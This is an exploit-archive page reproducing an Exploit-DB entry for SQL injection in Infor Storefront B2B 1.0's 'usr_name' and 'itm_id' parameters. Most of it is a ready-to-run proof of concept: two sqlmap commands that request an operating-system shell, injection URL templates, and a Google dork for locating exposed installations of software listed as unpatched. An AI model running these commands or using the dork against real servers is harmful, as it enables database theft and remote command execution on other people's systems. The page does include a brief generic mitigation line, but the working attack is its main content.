header-logo
Suggest Exploit
vendor:
Infor Storefront
by:
ratboy
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Infor Storefront
Affected Version From: Infor Storefront
Affected Version To: Infor Storefront
Patch Exists: NO
Related CWE: N/A
CPE: a:insitesoft:infor_storefront
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows All Versions
2020

Infor Storefront B2B 1.0 – ‘usr_name’ SQL Injection

Infor Storefront B2B 1.0 is vulnerable to SQL injection via the 'usr_name' and 'itm_id' parameters. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing a SQL injection payload. This can be done by appending a single quote character followed by a semicolon and a double dash to the end of the parameter value. This will cause the application to execute the malicious payload, allowing an attacker to gain access to the underlying database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
# Google Dork: inurl:storefrontb2bweb
# Date: 2020-06-27
# Exploit Author: ratboy
# Vendor Homepage: https://www.insitesoft.com/infor-storefront/
# Version: Infor Storefront
# Tested on: Windows All Versions

[POC Multiple Vulns]

python sqlmap.py -u
"http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass"
-p usr_name --dbms=mssql --level=5 --risk=3
--tamper=between,space2comment -o --random-agent --parse-errors
--os-shell --technique=ES


python sqlmap.py -u
"http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1"
-p itm_id --dbms=mssql --level=5 --risk=3
--tamper=between,space2comment -o --random-agent --parse-errors
--os-shell --technique=ES


or...

http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL
INJECTION];--

http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL
INJECTION];--



-- 
Sincerly,
Aaron Schrom

Navigation

Suggest Exploit

Services By CQR